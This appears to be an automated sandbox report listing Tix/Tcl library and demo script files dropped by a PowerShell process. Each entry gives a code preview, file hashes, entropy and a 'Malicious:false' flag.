                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: StdBBox.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# StdBBox.tcl --..#..#.Standard Button Box, used in standard dialog boxes..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#........tixWidgetClass tixStdButtonBox {.. -classname TixStdButtonBox.. -superclass tixButtonBox.. -flag {...-applycmd -cancelcmd -helpcmd -okcmd.. }.. -configspec {...{-applycmd applyCmd ApplyCmd ""}...{-cancelcmd cancelCmd CancelCmd ""}...{-helpcmd helpCmd HelpCmd ""}...{-okcmd okCmd OkCmd ""}.. }.. -default {...{.borderWidth .1}...{.relief .raised}...{.padX ..5}...{.padY ..10}...{*Button.anchor.c}...{*Button.padX.5}.. }..}....proc tixStdButtonBox:ConstructWidget {w} {.. upvar #0 $w data.... tixChainMethod $w Const
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1222
                                                                                                                                                                                                                      Entropy (8bit):5.127065375391994
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:RLu2usa20As8vkHKNVN6IhHkSDmG2hOFJ24B:RL7rvkq7MZSDmGDL
                                                                                                                                                                                                                      MD5:DF1A3EE34557801A81576FC0345805FB
                                                                                                                                                                                                                      SHA1:1622FAA754068F070F3981133AA15DF179436BB2
                                                                                                                                                                                                                      SHA-256:AEBA32E5813152FC4318068D5A6F5D40F68FEA5124C981B8520D829057D21B26
                                                                                                                                                                                                                      SHA-512:0C5C176BF51333A5D100125C9CAE67A27E38CFAF6458E132EC7260E4FE82FD0F3993DF089CB751A70B44F87DE00919788CF0AA5636281C8B25893391DE544FCA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: StdShell.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# StdShell.tcl --..#..#.Standard Dialog Shell...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixStdDialogShell {.. -classname TixStdDialogShell.. -superclass tixDialogShell.. -method {}.. -flag {...-cached.. }.. -configspec {...{-cached cached Cached ""}.. }..}....proc tixStdDialogShell:ConstructWidget {w} {.. upvar #0 $w data.... tixChainMethod $w ConstructWidget.. set data(w:btns) [tixStdButtonBox $w.btns].. set data(w_tframe) [frame $w.tframe].... pack $data(w_tframe) -side top -expand yes -fill both.. pack $data(w:btns) -side bottom -fill both.... tixCallMethod $w ConstructTopFrame $data(w_tfram
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):18962
                                                                                                                                                                                                                      Entropy (8bit):4.843993010391242
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:Qj2oeNaRRfjoOrfsGw6yjd/7Z6mtDV/o19:C2oIZ6mtDV/o19
                                                                                                                                                                                                                      MD5:C03819B835BEB76A43C6F49B5EC7A0A0
                                                                                                                                                                                                                      SHA1:F8F33455D74625938DB84AFC2199DCE23513C9D4
                                                                                                                                                                                                                      SHA-256:3E6A976CC1FEE5512CEDB6EBE8C2D41AF922B5650C0EA183E694A3DA691DC44C
                                                                                                                                                                                                                      SHA-512:6321D5C61F22EFF95DE1571E257B6B732F72F19978F8BB56FE456209DBC597860F8B41C4EFCCCA3B661055CDEAA2D21496B3738E3A3F865BE0C3A49B6DBA948D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: TList.tcl,v 1.6 2002/01/24 09:13:58 idiscovery Exp $..#..# TList.tcl --..#..#.This file defines the default bindings for Tix Tabular Listbox..#.widgets...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....global tkPriv..if {![llength [info globals tkPriv]]} {.. tk::unsupported::ExposePrivateVariable tkPriv..}....#--------------------------------------------------------------------------..# tkPriv elements used in this file:..#..# afterId -..Token returned by "after" for autoscanning...# fakeRelease -..Cancel the ButtonRelease-1 after the user double click..#--------------------------------------------------------------------------..#..proc tixTListBind {} {.. tixBind TixTList <ButtonPress-1> {...tixTList:Button-1 %W %
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10135
                                                                                                                                                                                                                      Entropy (8bit):4.939150494688008
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:Cpw5LlSS3lgO+cDOptdlJtTl+/8eCVC6ZOU/Lx38/3+zOJrlsHiZDXLKLy3fw:CO5BgO+QOptJtc/8XZOU/Ld8vUOJrlsd
                                                                                                                                                                                                                      MD5:D5A29E3FA10275DBCE066D205A7A486F
                                                                                                                                                                                                                      SHA1:594809DA06846C5327236225ECF71CED355A4F90
                                                                                                                                                                                                                      SHA-256:63FC95A796F3CCA4C7F91545E22370B09E52321FC5505379FB4769C22D565BBE
                                                                                                                                                                                                                      SHA-512:5B7027BA583FEEAAF3DA523F7954BE56F4695CFB474D5C3DF6B07B79B278BD02A6EF4C728EDDF7D074928AF45F6FD27766E062A82E3DA4D413F65AAAEBABF758
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Tix.tcl,v 1.14 2008/03/17 23:01:10 hobbs Exp $..#..# Tix.tcl --..#..#.This file implements the Tix application context class..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixClass tixAppContext {.. -superclass {}.. -classname TixAppContext.. -method {...cget configure addbitmapdir filedialog getbitmap getimage...option platform resetoptions setbitmap initstyle.. }.. -flag {...-binding -debug -extracmdargs -filedialog -fontset -grabmode...-haspixmap -libdir -scheme -schemepriority -percentsubst.. }.. -readonly {...-haspixmap.. }.. -configspec {...{-binding ..TK}...{-debug ..0}...{-extracmdargs ..1}...{-filedialog .""}...{-fontset ..WmDefault}..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4890
                                                                                                                                                                                                                      Entropy (8bit):4.836095045750968
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RL70A8KvkAGmLS0agOWvbVCbJD7H1E3ceOyRsSma/UvdhfXRT1x5YG1AUTuqxsRM:F7r8IGc3SyRmaAd9XRTEqb9asb
                                                                                                                                                                                                                      MD5:8E236BF0DA690F00F785CBD9688C6249
                                                                                                                                                                                                                      SHA1:371C437C9E1CDCA2B923AB1FCC27524988B37AC7
                                                                                                                                                                                                                      SHA-256:C5BEE47B3AD77318370F226FB9199B2330F8AC2DE156B37DA09DFDFFDCB7EF96
                                                                                                                                                                                                                      SHA-512:7ADB0035E95F41B607A1DAD703118E56673B83D77B51FA576F5B72FA386C39CE4250E1ABCE9613425EFAB7B04342E66474493AC647F287D2BE3FF3E2F56D0317
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Tree.tcl,v 1.7 2004/04/09 21:39:12 hobbs Exp $..#..# Tree.tcl --..#..#.This file implements the TixTree widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......tixWidgetClass tixTree {.. -classname TixTree.. -superclass tixVTree.. -method {...autosetmode close getmode open setmode.....addchild anchor column delete entrycget...entryconfigure header hide indicator info...item nearest see selection show.. }.. -flag {...-browsecmd -command -opencmd -closecmd.. }.. -configspec {...{-browsecmd browseCmd BrowseCmd ""}...{-command command Command ""}...{-closecmd closeCmd CloseCmd ""}...{-opencmd openCmd OpenCmd ""}.. }.. -default {...{.scrollbar...auto}...{*Scrollbar.takeFocus 0}...{*bord
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):11230
                                                                                                                                                                                                                      Entropy (8bit):5.010019756380522
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:pAxGu7RqM4PgizgY2mEKCPEKTrlY1SUcGoXK3wp9wwxhjgCwIvk9b537W9WiFg35:e1qBgD4ngfwwxhRwIvk9b53iUiFg3IvW
                                                                                                                                                                                                                      MD5:CC3FB8EA4300CD9FDC8F784026B17F58
                                                                                                                                                                                                                      SHA1:F931017EE622982936CF82AA39C70489CA2268F3
                                                                                                                                                                                                                      SHA-256:E879818465F3B7EB33C6121D7F104B1342EE2DC04A2968A112D2C6DB620EE903
                                                                                                                                                                                                                      SHA-512:8598BEB1629D4D832F7B12EFDE3C0C59B7BF56AC8C8C6BA52049DDEDD7437E42EF1884FC873AC740922E4647E2430B304D519539902299EEFD2A697D31D52A82
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Utils.tcl,v 1.4 2004/03/28 02:44:57 hobbs Exp $..#..# Util.tcl --..#..#.The Tix utility commands. Some of these commands are..#.replacement of or extensions to the existing TK..#.commands. Occasionaly, you have to use the commands inside..#.this file instead of thestandard TK commands to make your..#.applicatiion work better with Tix. Please read the..#.documentations (programmer's guide, man pages) for information..#.about these utility commands...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#......#..# kludge: should be able to handle all kinds of flags..# now only handles "-flag value" pairs...#..proc tixHandleArgv {p_argv p_options validFlags} {.. upvar $p_options opt.. u
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5280
                                                                                                                                                                                                                      Entropy (8bit):4.922547462636755
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:FJUl0Sj7Ji0vuv5Gk8pHBGDFiEFBGNFomSWy++yDbf7MbdzD57t0a2iWYOgtGUA:slhfFbobhFOavgUA
                                                                                                                                                                                                                      MD5:BF0F5E32FD6DED3AAA50F03BB73FA118
                                                                                                                                                                                                                      SHA1:3F8090A1F04CC90F6FA4E066387708BF378B805F
                                                                                                                                                                                                                      SHA-256:A5B2EDEB99E70CBEFF4B7322B6A8958334330D23C1F178FE2EF1A7AD2DE4EE33
                                                                                                                                                                                                                      SHA-512:1DAE4854FFE00EEA5837C5EE9476BACFB6813293765922141D5C4EBDD8E0A7A2B220EEE25FCC614C6034B4B7FA5DE83411FD305CE6CAD875D2FD8DC1022B4139
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: VResize.tcl,v 1.3 2004/03/28 02:44:57 hobbs Exp $..#..# VResize.tcl --..#..#.tixVResize:..#.Virtual base class for all classes that provide resize capability,..#.such as the resize handle and the MDI client window...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixVResize {.. -virtual true.. -classname TixVResize.. -superclass tixPrimitive.. -method {...drag dragend dragstart.. }.. -flag {...-gridded -gridx -gridy -minwidth -minheight.. }.. -configspec {.. .{-gridded gridded Gridded false}...{-gridx gridX Grid 10}...{-gridy gridY Grid 10}...{-minwidth minWidth MinWidth 0}...{-minheight minHeight MinHeight 0}.. }..}......proc tixVResize:InitWidge
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10081
                                                                                                                                                                                                                      Entropy (8bit):4.968728571642703
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:fVQFbG10lZYfb/o9USNXjrRKOzkrKTCjj4kfV1fa3EZ6D2uyDtu1nAsv9:2FP6z/oSSNzdKMkgEZ63SwAQ
                                                                                                                                                                                                                      MD5:E9B53D9FE13C927BABD2A88E088621C3
                                                                                                                                                                                                                      SHA1:B2721B4668E6B73304CFC3C00547EB3F235B2FB8
                                                                                                                                                                                                                      SHA-256:74793E12D762DA6483D955F4D3E32096F093906E51E69916B5C383BAB663B019
                                                                                                                                                                                                                      SHA-512:36BCB74737F154FD0F74091F92FC58619A4C82E5221062A50247961732ADEACA789C086A26D7EFC4C79490E40E0CE54D9B78BDD76D9E252C66BD8E426267AA36
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: VStack.tcl,v 1.4 2004/03/28 02:44:57 hobbs Exp $..#..# VStack.tcl --..#..#.Virtual base class, do not instantiate! This is the core..#.class for all NoteBook style widgets. Stack maintains a list..#.of windows. It provides methods to create, delete windows as..#.well as stepping through them...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#..#......tixWidgetClass tixVStack {.. -virtual true.. -classname TixVStack.. -superclass tixPrimitive.. -method {...add delete pageconfigure pagecget pages raise raised.. }.. -flag {...-dynamicgeometry -ipadx -ipady.. }.. -configspec {...{-dynamicgeometry dynamicGeometry DynamicGeometry 0 tixVerifyBoolean}...{-ipadx ipadX Pad 0}...{-ipady ipadY Pad 0}.. }..}...
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4605
                                                                                                                                                                                                                      Entropy (8bit):4.963359022686653
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RL/jchkFER/cUCFJpzBWlAqh0MqhxStfCnJavU7b3QLL2DS5y5g1xqK:FFA/72YAqtqXSma833XDS5y5IxqK
                                                                                                                                                                                                                      MD5:D4EDEAD8088CCC7277DB040BAEEEE3B8
                                                                                                                                                                                                                      SHA1:FDA07461C6DC44825938E1131B6749F3BE729649
                                                                                                                                                                                                                      SHA-256:E3F96013E5BC6342A8B2023B1EED5B5688DD8E2C84BA1BFD12719162DEB9675F
                                                                                                                                                                                                                      SHA-512:6A3091BEDF44925F61F1427D71C5F0EC41D387154CAC1D137BBE935EAB5C3EDCA7A998733DBE1B9FE9DEB11A155C77939E0C7F2AF5D4408E427F22E877923C3B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: VTree.tcl,v 1.6 2004/03/28 02:44:57 hobbs Exp $..#..# VTree.tcl --..#..#.Virtual base class for Tree widgets...#..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...# Copyright (c) 2004 ActiveState..#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....tixWidgetClass tixVTree {.. -virtual true.. -classname TixVTree.. -superclass tixScrolledHList.. -method {.. }.. -flag {...-ignoreinvoke.. }.. -configspec {...{-ignoreinvoke ignoreInvoke IgnoreInvoke false tixVerifyBoolean}.. }.. -default {.. }..}....proc tixVTree:InitWidgetRec {w} {.. upvar #0 $w data.... tixChainMethod $w InitWidgetRec..}....proc tixVTree:ConstructWidget {w} {.. upvar #0 $w data.... tixChainMethod $w ConstructWidget.... set data(indStyle) \...[tixDisplayStyle ima
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2664
                                                                                                                                                                                                                      Entropy (8bit):4.930601389703306
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:RLUPmK+9H4vkqPFPM+TMgquu6MB0Rfdb6ReYouv+dMZ+7TORIWX3LJWF:FDPCPdf00Zd2RejdMZOORNX3LMF
                                                                                                                                                                                                                      MD5:4FC2DC59485F7DACB0A1A8814EDCEB67
                                                                                                                                                                                                                      SHA1:ED73264FF5A5A2CF6F9B644D198DDE7876778F06
                                                                                                                                                                                                                      SHA-256:B7449919F74570A9A60453A5E85C9996342B50CF922BB9D643EE81B680C21ED4
                                                                                                                                                                                                                      SHA-512:31B8C2AEE6C55B2E31D4C4357D4E937DF4D0605AB07A7F9E8123C8A30D9F5E07917C0E8119E28982B009DC10B305FED31F4E7445C5A8BF0FC60AA8A7E1E7877D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: Variable.tcl,v 1.4 2001/12/09 05:04:02 idiscovery Exp $..#..# Variable.tcl --..#..#.Routines in this file are used to set up and operate variables..#.for classes that support the -variable option..#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#........# tixVariable:ConfigVariable --..#..# .Set up the -variable option for the object $w..#..# Side effects:..#..#.data(-variable) is changed to the name of the global variable..#.if the global variable exists, data(-value) takes the value of this..#.variable...#.if the global variable does not exist, it is created with the..#.current data(-value)..#..# Return value:..#..#.true is data(-value) is changed, indicating that data(-command)..#.should be invoked...#..proc tixVariable:Co
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1005
                                                                                                                                                                                                                      Entropy (8bit):5.094028836611686
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:RLu2usa00ssbZGql6KvkovQrDXwEjKZUpvX9x:RLfCYG6KvkdFKc9x
                                                                                                                                                                                                                      MD5:BE3E74F04AD14CD6ED675B57D31D62EB
                                                                                                                                                                                                                      SHA1:C1EE463B9A1FF3C54389FBDAF1662D093F110655
                                                                                                                                                                                                                      SHA-256:83CAABAC9926AC5A7CF5DEE949199E721F79FADFFD1B8A7F81F7F634F658B0EE
                                                                                                                                                                                                                      SHA-512:F722D4545E76BDE5E248DFD0769AA9F636AD0992A9095790AC0F178E9CED96F0561D94F081D7BE216A213A8948F66B29B2716D17E0D225B65E7E150181CEA480
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*- mode: TCL; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: WInfo.tcl,v 1.2 2001/12/09 05:04:02 idiscovery Exp $..#..# WInfo.tcl --..#..#.This file implements the command tixWInfo, which return various..#.information about a Tix widget...#..# Copyright (c) 1993-1999 Ioi Kim Lam...# Copyright (c) 2000-2001 Tix Project Group...#..# See the file "license.terms" for information on usage and redistribution..# of this file, and for a DISCLAIMER OF ALL WARRANTIES...#....proc tixWInfo {option w} {.. upvar #0 $w data.... case $option {...tix {... # Is this a Tix widget?... #... return [info exists data(className)]...}...compound {... # Is this a compound widget?... #.Currently this is the same as "tixWinfo tix" because only... # Tix compilant compound widgets are supported... return [info exists data(className)]...}...class {... if {[info exists data(className)]} {....return $data(className)... } else {....return ""... }...}.. }
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3573
                                                                                                                                                                                                                      Entropy (8bit):4.807340044913598
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:gyXvWrW7fyEZQ1NMv2U5PflmrJxvTqE/YQD0E1WehoiT1NAVDr9udgB/bDZ1Ii1W:7fWQv2ZKf0X2Mh1hoI1GUgpp1PaZjC3i
                                                                                                                                                                                                                      MD5:3AC35BDAC135A07B29E71C4674F7FA22
                                                                                                                                                                                                                      SHA1:378DC41AD0470779C504A90E521E34A85FDBCA4C
                                                                                                                                                                                                                      SHA-256:988106B37C6E5993693D18A03368D0E1A84B8F95114B1832201C6361FF3C9E1C
                                                                                                                                                                                                                      SHA-512:5A2E5C4E6A81BACBEF794425CDB1E20628D0C493A3C57AA0F4C7556458498C95B4FEF18F5D3372C75AA1EBB9641073E234B802D6FF67764DFC43C450CE3F78B7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SGrid0.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# A very simple demonstration of the tixGrid widget..#....proc RunSample {w} {.. wm title $w "The First Grid Example".. wm geometry $w 480x300.... set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... label $top.lab -text "This widget is still under alpha..Please ignore the debug messages..Not all features have been implemented" -justify left.. pack $top.lab -side top -anchor
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5633
                                                                                                                                                                                                                      Entropy (8bit):4.926067037867941
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:lGfN2v2ZKf0XPg2yghD1jf1GUg2WqVpPaZjauWgncmU3i:oa2ZY4PSghDFZg2RjaZjauPUy
                                                                                                                                                                                                                      MD5:F1ABEDE140BC7048EB8E8DDBB6E50460
                                                                                                                                                                                                                      SHA1:1A8C3546E11AA6F541E04789368ED6A006C65C3A
                                                                                                                                                                                                                      SHA-256:CB0388C09B46AEB8828B36E6C3DD804456339731346C4839B2D6E87ABA31E6C8
                                                                                                                                                                                                                      SHA-512:0969A92641CCBE9A8526E8A34CD5219CE9460DBAF2B0D596D0E2B7A9F410880067BD13D7F147F80039019EB24DC281674798FBF1C2FCB02007200067D7F7F99D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SGrid1.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# Demonstrates the tixGrid widget..#....proc RunSample {w} {.. wm title $w "Doe Inc. Performance".. wm geometry $w 640x300.... set top [frame $w.f -bd 1 -relief raised].. set box [tixButtonBox $w.b -bd 1 -relief raised].... pack $box -side bottom -fill both.. pack $top -side top -fill both -expand yes.... label $top.lab -text "This widget is still under alpha..Please ignore the debug messages..Not all features have been implemented" -justify left.. pack $top.lab -side top -anchor c -padx 3 -pady 3..
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):3208
                                                                                                                                                                                                                      Entropy (8bit):4.882344453850518
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:kyXv+TSQlu+AeD7I64XB10P3yT446xGQwjg+CCIQKz9fZWjr4ksJHeiP1N:3f+OQlJAjzT04ywjg+L4fZKdW9/
                                                                                                                                                                                                                      MD5:224E6F60D7E68BE97AF5DECA922C89C7
                                                                                                                                                                                                                      SHA1:72EACE1E07BF27810867BED887D1A31E305B0285
                                                                                                                                                                                                                      SHA-256:5884FEA04EC99096D649AD1C7D389D179C05B6CDD5641667270C1E2B73D3990C
                                                                                                                                                                                                                      SHA-512:D8CF16D02FD0BE93A9DBA3E3C814ED1FF87EF9528FA0AEF3CCD99F91D1C76A1521B7374B25267DB5E7E745E822380D3F9BA4C5F50E366E83F0C9BEF44553F907
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SHList.tcl,v 1.3 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates the use of the tixScrolledHList widget...#....proc RunSample {w} {.... # We create the frame and the ScrolledHList widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Put a simple hierachy into the HList (two levels). Use colors and.. # separator widgets (frames) to make the list look fancy.. #.. tixScrolledHList $w.top.a.. pack $w.top.a -expand yes -fill both -padx 10 -pady 10 -side left...... # This is our little relational database.
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5092
                                                                                                                                                                                                                      Entropy (8bit):4.827384096302168
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:2fJQlJB29Y9wuJJ71yjNVXjsGs4fZKdW9/:2R8BQYKuJaoGsqZf/
                                                                                                                                                                                                                      MD5:9008C122AAC052DEFBC0001EF2522904
                                                                                                                                                                                                                      SHA1:2C6129114D4CED51D04DE8DA59B5150C04276D4C
                                                                                                                                                                                                                      SHA-256:C4F0A6C494C789B5E5B5F3CE4454B116DA9A57B92CAAE28EA767280E1FD66F55
                                                                                                                                                                                                                      SHA-512:FE1CEB2E729C52B1FB3199E80F030920FBC4218779FB531E3E06301C4BBB4AC958A5F63446088C6F294015BDDE8790837E81CE2D41CA9C216740E02DC731F533
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# -*-mode: tcl; fill-column: 75; tab-width: 8; coding: iso-latin-1-unix -*-..#..#.$Id: SHList2.tcl,v 1.4 2001/12/09 05:31:07 idiscovery Exp $..#..# Tix Demostration Program..#..# This sample program is structured in such a way so that it can be..# executed from the Tix demo program "widget": it must have a..# procedure called "RunSample". It should also have the "if" statment..# at the end of this file so that it can be run as a standalone..# program using tixwish.....# This file demonstrates how to use multiple columns and multiple styles..# in the tixHList widget..#..# In a tixHList widget, you can have one ore more columns. ..#....proc RunSample {w} {.... # We create the frame and the ScrolledHList widget.. # at the top of the dialog box.. #.. frame $w.top -relief raised -bd 1.... # Put a simple hierachy into the HList (two levels). Use colors and.. # separator widgets (frames) to make the list look fancy.. #.. tixScrolledHList $w.top.a -options {...hlist.col
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2949
                                                                                                                                                                                                                      Entropy (8bit):4.865670603629745
                                                                                                                                                                                                                      Encrypted:false
